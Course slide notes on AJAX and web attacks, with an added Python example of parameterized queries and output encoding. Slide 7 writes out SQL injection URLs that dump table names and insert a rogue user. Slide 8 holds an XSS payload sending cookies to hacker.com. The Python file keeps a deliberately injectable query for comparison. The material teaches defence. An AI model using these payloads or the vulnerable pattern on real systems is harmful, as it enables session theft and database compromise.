2. AJAX - what & why?
Asynchronous JavaScript and XML
Why? Improve performance:
Avoid a postback, which saves the page-reload time
Transfer a smaller amount of data across the network
Example: select year, make, model
7. Web Attack - Parameter manipulation
/student/details/1000 - change it to 1001?
SQL Injection
query = "select product_name from product where product_id=" + PID
PID comes from a web parameter:
http://myweb.com/product.aspx?PID=1
http://myweb.com/product.aspx?PID=1;union select name from sysobjects where xtype='U'
The hacker adds himself to the Users table:
http://myweb.com/product.aspx?PID=1; insert into Users (uname, pword) values ('hacker', 'hacked')
8. Web Attack - cross site scripting (XSS)
Once you compromise the database, insert JavaScript into the tables:
product.description = '<script>document.location="http://hacker.com/collector.html?cookie="+document.cookie</script>'
The hacker now knows your cookie when the content is rendered.
Danger of cross site scripting:
The contents of the current document's cookie are sent off to hacker.com
Session IDs and authentication tokens are commonly stored in cookies
JavaScript can log keystrokes
9. Web Attack - Prevention
Remove all code open to SQL injection
HTML-encode all displayed data to prevent XSS
Treat any input as a potential threat: a user can enter JavaScript in a textbox or textarea
Use validation on the server (the user could disable JavaScript error checking in the browser)
Encrypt cookies:
user_id="100" // No
user_id="CQZJU-VQRQF-LAWFI-HGCPL-MTNTS-JYOPD-TIJYV-INMYJ-TVLLC-RWJOT-CTHAM-GJQHD"
Uploaded files:
Email attachments
Business documents
Servers should run a virus checker on all uploaded files
10. Web Attack and AJAX
The methods of a Web service are analogous to the form inputs of a Web application.
They are easy to find, easy to attack.
WSDL is now open to the public (example data often provided)
12. Web Attack - white vs. black
Exposed BL domain model
13. Web Attack - Ajax security mistakes
Solution:
Use cookie at the WEB web-service
14. Web Attack - Securing Ajax server
Install a validation filter
Use regular expressions to validate input strings
Use regular expressions to remove "attack" characters: < & / >, etc.
Validate the user through cookies/sessions (WEB web-services)
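Added example (not from the slides or the course project) putting slide 9's and slide 14's prevention points into Python: slide 7's concatenated query beside a parameterized one, a regex allow-list for PID, and HTML-encoding of a stored description. The product and Users tables and their rows are constructed here, and sqlite3 stands in for the SQL Server the slides assume.

```python
import html
import re
import sqlite3


def make_db():
    # Constructed in-memory stand-in for the product and Users tables on slide 7.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table product (product_id integer, product_name text, description text);
        create table Users (uname text, pword text);
        insert into product values (1, 'Widget', 'A plain description');
        insert into Users values ('alice', 'secret');
    """)
    return db


def lookup_vulnerable(db, pid):
    # Slide 7's pattern: the web parameter is pasted into the SQL text, so
    # anything after the number is parsed and run as SQL.
    query = "select product_name from product where product_id=" + pid
    return [row[0] for row in db.execute(query)]


def lookup_safe(db, pid):
    # Parameterized query: PID is bound as a value and never parsed as SQL,
    # so an injected "union select" simply matches no row.
    rows = db.execute(
        "select product_name from product where product_id=?", (pid,))
    return [row[0] for row in rows]


PID_RE = re.compile(r"[0-9]{1,9}")


def validate_pid(pid):
    # Server-side allow-list (slide 14): accept only a short run of digits.
    return PID_RE.fullmatch(pid) is not None


def render_description(description):
    # HTML-encode on output (slide 9): a stored <script> tag is displayed
    # as literal text instead of being executed by the browser.
    return html.escape(description, quote=True)


if __name__ == "__main__":
    db = make_db()
    attack = "1 union select uname from Users"
    print(lookup_vulnerable(db, attack))  # leaks a row of the Users table
    print(lookup_safe(db, attack))        # []
```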
15. Review questions
Is AJAX synchronous or asynchronous?
Why use AJAX?
Is the AJAX architecture more secure or less?
What is XSS?
What is the difference between white box and black box?
16. Your assignment
Complete your MVC project with test cases
Project due next Thursday
17. Lab
Due: Grade your middle tier and test cases
18. References
.NET: Architecting Applications for the Enterprise
Ajax Security